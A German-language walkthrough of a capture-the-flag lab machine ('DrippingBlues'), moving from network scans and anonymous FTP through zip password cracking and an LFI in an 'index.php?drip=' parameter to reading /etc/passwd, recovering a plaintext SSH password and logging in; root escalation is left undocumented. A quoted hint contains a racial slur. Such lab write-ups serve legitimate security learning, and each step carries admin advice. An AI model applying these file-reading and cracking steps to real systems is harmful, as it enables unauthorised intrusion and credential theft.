Analyse: Der Befehl `arp-scan -l` wird verwendet, um aktive Hosts im lokalen Netzwerksegment durch Senden von ARP-Anfragen zu identifizieren.
Bewertung: Ein Host mit der IP 192.168.2.114 und der MAC-Adresse 08:00:27:91:e9:96 (Oracle VirtualBox) wurde als Ziel identifiziert.
Empfehlung (Pentester): Notiere die Ziel-IP für nachfolgende Scans.
Empfehlung (Admin): Netzwerksegmentierung und ARP-Monitoring können die Erkennung erschweren.
Interface: eth0, type: EN10MB, MAC: 00:00:00:00:00:af, IPv4: 192.168.2.129 Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.2.1 c4:86:e9:a5:6d:18 HUAWEI TECHNOLOGIES CO.,LTD 192.168.2.114 08:00:27:91:e9:96 PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.8: 256 hosts scanned in 1.863 seconds (137.41 hosts/sec). 2 responded
Analyse: Ein Nmap-Scan wird auf das Ziel 192.168.2.114 durchgeführt. Optionen: `-sS` (SYN Scan), `-sC` (Standard-Skripte), `-T5` (schnelles Timing), `-A -O` (umfassender Scan inkl. OS-Erkennung), `-p-` (alle Ports).
Bewertung: Drei offene Ports wurden gefunden: * **21 (FTP):** vsftpd 3.0.3. Anonymer Login ist erlaubt. Eine Datei `respectmydrip.zip` ist vorhanden und scheinbar für anonyme Benutzer schreibbar (`[NSE: writeable]`). * **22 (SSH):** OpenSSH 8.2p1 (Ubuntu). * **80 (HTTP):** Apache 2.4.41 (Ubuntu). Die `robots.txt` verbietet `/dripisreal.txt` und `/etc/dripispowerful.html`, was auf potenziell interessante Dateien hindeutet. Das Betriebssystem wird als Linux 4.x/5.x erkannt.
Empfehlung (Pentester): Untersuche den anonymen FTP-Zugriff, lade `respectmydrip.zip` herunter und prüfe die Schreibrechte. Untersuche die in `robots.txt` genannten Pfade auf dem Webserver.
Empfehlung (Admin): Deaktivieren Sie anonymen FTP-Zugriff oder beschränken Sie ihn stark (keine Schreibrechte, nur Lesezugriff auf nicht-sensible Daten). Überprüfen Sie die Notwendigkeit und den Inhalt der in `robots.txt` genannten Dateien. Halten Sie alle Dienste aktuell.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 01:20 CEST Nmap scan report for drippingblues (192.168.2.114) Host is up (0.00017s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ffff:192.168.2.129 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable] 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA) | 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA) |_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | http-robots.txt: 2 disallowed entries |_/dripisreal.txt /etc/dripispowerful.html |_http-server-header: Apache/2.4.41 (Ubuntu) MAC Address: 08:00:27:91:E9:96 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.17 ms drippingblues (192.168.2.114) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.31 seconds
Analyse: Der anonyme FTP-Zugriff wird manuell überprüft. Die Datei `respectmydrip.zip` wird heruntergeladen. Versuche, das Verzeichnis zu wechseln oder Dateien hochzuladen (`put read.xml`), scheitern an fehlenden Berechtigungen, obwohl Nmap Schreibrechte für die ZIP-Datei anzeigte. Die heruntergeladene `respectmydrip.zip` wird analysiert.
Bewertung: Der Download der ZIP-Datei war erfolgreich. Die Schreibrechte auf dem FTP scheinen trotz Nmap-Hinweis eingeschränkt zu sein (Upload nicht möglich). Die Analyse der `respectmydrip.zip` ergibt: 1. Sie ist passwortgeschützt. 2. Der Hash wird mit `zip2john` extrahiert. 3. Das Passwort wird mit `john` und `rockyou.txt` geknackt: `072528035`. 4. Beim Entpacken enthält sie `respectmydrip.txt` (mit dem Hinweis "just focus on 'drip'") und eine weitere passwortgeschützte Datei `secret.zip`. 5. Der Versuch, `secret.zip` mit `zip2john` und `john` zu knacken, scheitert mit der `rockyou.txt`-Liste.
Empfehlung (Pentester): Behalte den Hinweis "drip" im Hinterkopf. Da `secret.zip` nicht geknackt werden konnte, konzentriere dich auf den Webserver (Port 80) und die Pfade aus `robots.txt`.
Empfehlung (Admin): Deaktivieren Sie anonymen FTP-Zugriff. Verwenden Sie starke Passwörter für Archive. Vermeiden Sie das Speichern verschachtelter, passwortgeschützter Archive an zugänglichen Orten. Überprüfen Sie FTP-Berechtigungen sorgfältig.
Connected to 192.168.2.114. 220 (vsFTPd 3.0.3) Name (192.168.2.114:cyber): Anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||42128|) 150 Here comes the directory listing. -rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip 226 Directory send OK. ftp> get respectmydrip.zip local: respectmydrip.zip remote: respectmydrip.zip 229 Entering Extended Passive Mode (|||64266|) 150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes). 100% |*****************************************************************************************************| 471 11.26 KiB/s 00:00 ETA 226 Transfer complete. 471 bytes received in 00:00 (11.19 KiB/s) ftp> cd .. 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||26670|) 150 Here comes the directory listing. -rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip 226 Directory send OK. ftp> cd .. 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||19745|) 150 Here comes the directory listing. -rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip 226 Directory send OK. ftp> cd /home 550 Failed to change directory. ftp> cd ../home 550 Failed to change directory. ftp> put read.xml local: read.xml remote: read.xml 229 Entering Extended Passive Mode (|||47276|) 550 Permission denied. ftp> quit 221 Goodbye.
... -rw-r--r-- 1 root root 471 19. Sep 2021 respectmydrip.zip ...
Archive: respectmydrip.zip [respectmydrip.zip] respectmydrip.txt password:
ver 2.0 respectmydrip.zip/respectmydrip.txt PKZIP Encr: cmplen=32, decmplen=20, crc=5C92F12B ts=96AB cs=5c92 type=0 ver 2.0 respectmydrip.zip/secret.zip is not encrypted, or stored with non-handled compression type
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
072528035 (respectmydrip.zip/respectmydrip.txt)
1g 0:00:00:02 DONE (2023-04-15 01:24) 0.3802g/s 5681Kp/s 5681Kc/s 5681KC/s 072647150..068763201&
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password: 072528035
extracting: respectmydrip.txt
inflating: secret.zip
Archive: secret.zip [secret.zip] secret.txt password:
ver 2.0 secret.zip/secret.txt PKZIP Encr: cmplen=17, decmplen=12, crc=03D5A50D ts=970A cs=03d5 type=8
Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 12 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:02 DONE (2023-04-15 01:25) 0g/s 6729Kp/s 6729Kc/s 6729KC/s "mariangelo1991"..7¡Vamos! Session completed. # Kein Passwort gefunden
just focus on "drip"
Analyse: Gobuster wird erneut eingesetzt, um Verzeichnisse und Dateien auf dem Webserver zu finden, wobei eine umfangreiche Liste von Erweiterungen verwendet wird.
Bewertung: Dieser Scan findet nur `index.php` und `robots.txt`. Das ist weniger als im Nmap-Scan (der die robots.txt-Inhalte anzeigte). Möglicherweise wurde eine weniger effektive Wortliste verwendet oder der vorherige Gobuster-Lauf war auf eine andere Maschine gerichtet. Entscheidend ist jedoch der Fund von `robots.txt`.
Empfehlung (Pentester): Untersuche den Inhalt der `robots.txt`.
Empfehlung (Admin): Stellen Sie sicher, dass Directory Listing deaktiviert ist.
=============================================================== Gobuster v3.1.0 ... (Banner) ... =============================================================== [+] Url: http://192.168.2.114 [+] ... (Weitere Optionen) ... =============================================================== 2023/04/15 01:30:05 Starting gobuster =============================================================== http://192.168.2.114/index.php (Status: 200) [Size: 138] http://192.168.2.114/robots.txt (Status: 200) [Size: 78] ... =============================================================== 2023/04/15 01:35:21 Finished ===============================================================
Analyse: Der Inhalt der `robots.txt` wird abgerufen. Sie listet `/dripisreal.txt` und `/etc/dripispowerful.html` als "Disallowed". Die erste Datei (`/dripisreal.txt`) wird abgerufen und enthält einen Hinweis auf einen Songtext und MD5-Hashing. Es wird versucht, diesen Hinweis umzusetzen, indem eine Zeichenkette aus vielen "nigga"s gebildet und deren MD5-Hash berechnet wird. Ein SSH-Login-Versuch mit diesem Hash als Passwort für den Benutzer `thugger` (der vermutlich aus dem Hinweis abgeleitet wurde) schlägt fehl. Anschließend wird `wfuzz` verwendet, um GET-Parameter auf `index.php` zu fuzzten und nach LFI zu suchen. Der Parameter `drip` wird als verwundbar identifiziert. Mit diesem Parameter wird `/etc/passwd` gelesen, was den Benutzer `thugger` bestätigt. Schließlich wird mit `?drip=/etc/dripispowerful.html` die zweite in `robots.txt` genannte Datei gelesen, welche das Klartext-Passwort `imdrippinbiatch` enthält.
Bewertung: Die `robots.txt` lieferte den entscheidenden Hinweis. Der erste Hinweis in `/dripisreal.txt` war komplex und führte zu einem falschen Passwort (oder war für einen anderen Zweck gedacht). Der LFI-Fund im `drip`-Parameter (passend zum Hinweis aus der ZIP-Datei) war der Schlüssel. Das Auslesen von `/etc/dripispowerful.html` über die LFI enthüllte das korrekte SSH-Passwort für den Benutzer `thugger`.
Empfehlung (Pentester): Verwenden Sie das Passwort `imdrippinbiatch` für den SSH-Login als `thugger`.
Empfehlung (Admin): Beheben Sie die LFI-Schwachstelle dringend. Speichern Sie keine Passwörter im Klartext in Dateien im Webserver-Verzeichnis oder `/etc`. Überprüfen Sie die Inhalte von Dateien, die in `robots.txt` erwähnt werden.
# Inhalt von http://192.168.2.114/robots.txt User-agent: * Disallow: /dripisreal.txt Disallow: /etc/dripispowerful.html # Inhalt von http://192.168.2.114/dripisreal.txt hello dear hacker wannabe, go for this lyrics: https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html count the n words and put them side by side then md5sum it ie, hellohellohellohello >> md5sum hellohellohellohello it's the password of ssh
26ffdb7eb1b61dc39062395d246ecd53 -
The authenticity of host 'cve.hmv (192.168.2.114)' can't be established.
... (Key Fingerprint) ...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cve.hmv' (ED25519) to the list of known hosts.
thugger@cve.hmv's password: 26ffdb7eb1b61dc39062395d246ecd53 # Eingegeben
Permission denied, please try again.
... (Weitere Versuche) ...
thugger@cve.hmv: Permission denied (publickey,password).
******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.2.114/index.php?FUZZ=/etc/passwd Total requests: 220560 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 0000172073: 200 57 L 107 W 3032 Ch "drip" Total time: 130.9347 Processed Requests: 220560 Filtered Requests: 220559 Requests/sec.: 1684.503
# Zugriff via LFI auf /etc/passwd: http://192.168.2.114/index.php?drip=/etc/passwd
# Inhalt (Auszug):
root:x:0:0:root:/root:/bin/bash
...
thugger:x:1001:1001:,,,:/home/thugger:/bin/bash
...
# Zugriff via LFI auf /etc/dripispowerful.html: view-source:http://192.168.2.114/index.php?drip=/etc/dripispowerful.html
# Inhalt (Auszug):
password is:
imdrippinbiatch
Analyse: Es wird ein erneuter SSH-Login-Versuch für den Benutzer `thugger` gestartet, diesmal mit dem Passwort `imdrippinbiatch`, das durch die LFI-Schwachstelle gefunden wurde.
Bewertung: Der SSH-Login ist erfolgreich. Der initiale Zugriff auf das System als Benutzer `thugger` wurde erreicht.
Empfehlung (Pentester): Führen Sie Enumerationsschritte als `thugger` durch. Suchen Sie nach dem User-Flag, überprüfen Sie `sudo -l` und suchen Sie nach anderen Privilege-Escalation-Vektoren.
Empfehlung (Admin): Stellen Sie sicher, dass das Passwort geändert wird. Beheben Sie die LFI-Schwachstelle. Überwachen Sie SSH-Logins.
thugger@cve.hmv's password: imdrippinbiatch # Passwort eingegeben
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.11.0-34-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Sun Apr 16 01:40:00 2023 from 192.168.2.129
Analyse: Nach dem erfolgreichen Login als `thugger` werden grundlegende Enumerationsschritte durchgeführt: Auflisten des Home-Verzeichnisses (`ls -la`), Lesen der User-Flag (`cat user.txt`), Überprüfen der Sudo-Rechte (`sudo -l`) und Suchen nach SUID-Dateien (`find / -type f -perm -4000 -ls 2>/dev/null`).
Bewertung: Das User-Flag (`5C50FC503A2ABE93B4C5EE3425496521`) wird gefunden. Der Benutzer `thugger` hat keine `sudo`-Rechte. Die SUID-Suche liefert eine lange Liste von Binaries, viele davon innerhalb von Snap-Verzeichnissen (`/snap/...`). `/usr/bin/pkexec` ist ebenfalls vorhanden. Im Text wird ein Exploit für Polkit erwähnt (`CVE-2021-3560.py`), der aber nicht funktioniert hat. Es wird auf GTFOBins als alternative Lösung verwiesen, aber der spezifische Befehl oder die Methode zur Eskalation von `thugger` zu `root` wird im bereitgestellten Text *nicht dokumentiert*.
Empfehlung (Pentester): Da der Polkit-Exploit fehlschlug, überprüfen Sie GTFOBins auf Methoden zur Ausnutzung von Standard-SUID-Binaries (z.B. `find`, `cp`, `bash`, etc., falls vorhanden und falsch konfiguriert) oder anderen gefundenen Binaries. Untersuchen Sie die spezifische Version von `pkexec` auf Anfälligkeit für PwnKit (CVE-2021-4034). *Der genaue Weg zur Root-Eskalation fehlt in der Vorlage.*
Empfehlung (Admin): Halten Sie das System und alle Pakete (insbesondere Polkit/pkexec) aktuell, um bekannte Schwachstellen zu vermeiden. Minimieren Sie die Anzahl der SUID-Binaries. Konfigurieren Sie `sudo` nach dem Least-Privilege-Prinzip.
total 64 drwxr-xr-x 14 thugger thugger 4096 Eyl 19 2021 . drwxr-xr-x 3 root root 4096 Eyl 18 2021 .. -rw------- 1 thugger thugger 8 Eyl 19 2021 .bash_history drwxr-xr-x 10 thugger thugger 4096 Eyl 19 2021 .cache drwxr-xr-x 11 thugger thugger 4096 Eyl 19 2021 .config drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Desktop drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Documents drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Downloads drwxr-xr-x 3 thugger thugger 4096 Eyl 19 2021 .local drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Music drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Pictures drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Public drwx------ 2 thugger thugger 4096 Eyl 19 2021 .ssh drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Templates -r-x------ 1 thugger thugger 32 Eyl 19 2021 user.txt drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Videos
5C50FC503A2ABE93B4C5EE3425496521
[sudo] password for thugger: imdrippinbiatch # Passwort eingegeben
Sorry, user thugger may not run sudo on drippingblues.
816 84 -rwsr-xr-x 1 root root 85064 Kas 29 14:53 /snap/core20/1852/usr/bin/chfn 822 52 -rwsr-xr-x 1 root root 53040 Kas 29 14:53 /snap/core20/1852/usr/bin/chsh 891 87 -rwsr-xr-x 1 root root 88464 Kas 29 14:53 /snap/core20/1852/usr/bin/gpasswd 975 55 -rwsr-xr-x 1 root root 55528 Şub 7 2022 /snap/core20/1852/usr/bin/mount 984 44 -rwsr-xr-x 1 root root 44784 Kas 29 14:53 /snap/core20/1852/usr/bin/newgrp 999 67 -rwsr-xr-x 1 root root 68208 Kas 29 14:53 /snap/core20/1852/usr/bin/passwd 1109 67 -rwsr-xr-x 1 root root 67816 Şub 7 2022 /snap/core20/1852/usr/bin/su 1110 163 -rwsr-xr-x 1 root root 166056 Oca 16 16:06 /snap/core20/1852/usr/bin/sudo 1168 39 -rwsr-xr-x 1 root root 39144 Şub 7 2022 /snap/core20/1852/usr/bin/umount 1257 51 -rwsr-xr-- 1 root systemd-resolve 51344 Eki 25 16:09 /snap/core20/1852/usr/lib/dbus-1.0/dbus-daemon-launch-helper 1629 463 -rwsr-xr-x 1 root root 473576 Mar 30 2022 /snap/core20/1852/usr/lib/openssh/ssh-keysign 139 121 -rwsr-xr-x 1 root root 123560 Şub 22 18:11 /snap/snapd/18596/usr/lib/snapd/snap-confine # ... (lange Liste, gekürzt - enthält viele Snap-Binaries) ... 132020 32 -rwsr-xr-x 1 root root 31032 Ağu 16 2019 /usr/bin/pkexec # Potenziell interessant # ... (Weitere Standard-SUID-Binaries) ...
# Hinweis im Text: Polkit-Exploit (CVE-2021-3560) hat nicht funktioniert. # Lösung erfolgte stattdessen über GTFOBins (Spezifische Methode nicht dokumentiert).
Bewertung: Nach dem Erhalt des initialen Zugriffs als Benutzer `thugger` und dem Finden des User-Flags wurde eine SUID-Enumeration durchgeführt. Der bereitgestellte Text weist darauf hin, dass ein Polkit-Exploit fehlschlug und die Lösung zur Root-Eskalation über eine Methode aus GTFOBins erfolgte. Die spezifischen Befehle oder die ausgenutzte SUID-Binary für diesen Schritt sind jedoch im vorliegenden Text nicht dokumentiert.
Empfehlung (Pentester): Dokumentieren Sie den tatsächlichen Privilege-Escalation-Pfad (z.B. welcher Befehl von GTFOBins verwendet wurde), um den Bericht zu vervollständigen.
Empfehlung (Admin): Analysieren Sie die SUID-Binaries und Systemkonfigurationen, um den tatsächlichen Eskalationspfad zu identifizieren und zu schließen. Wenden Sie das Prinzip der geringsten Rechte konsequent an und halten Sie das System gepatcht.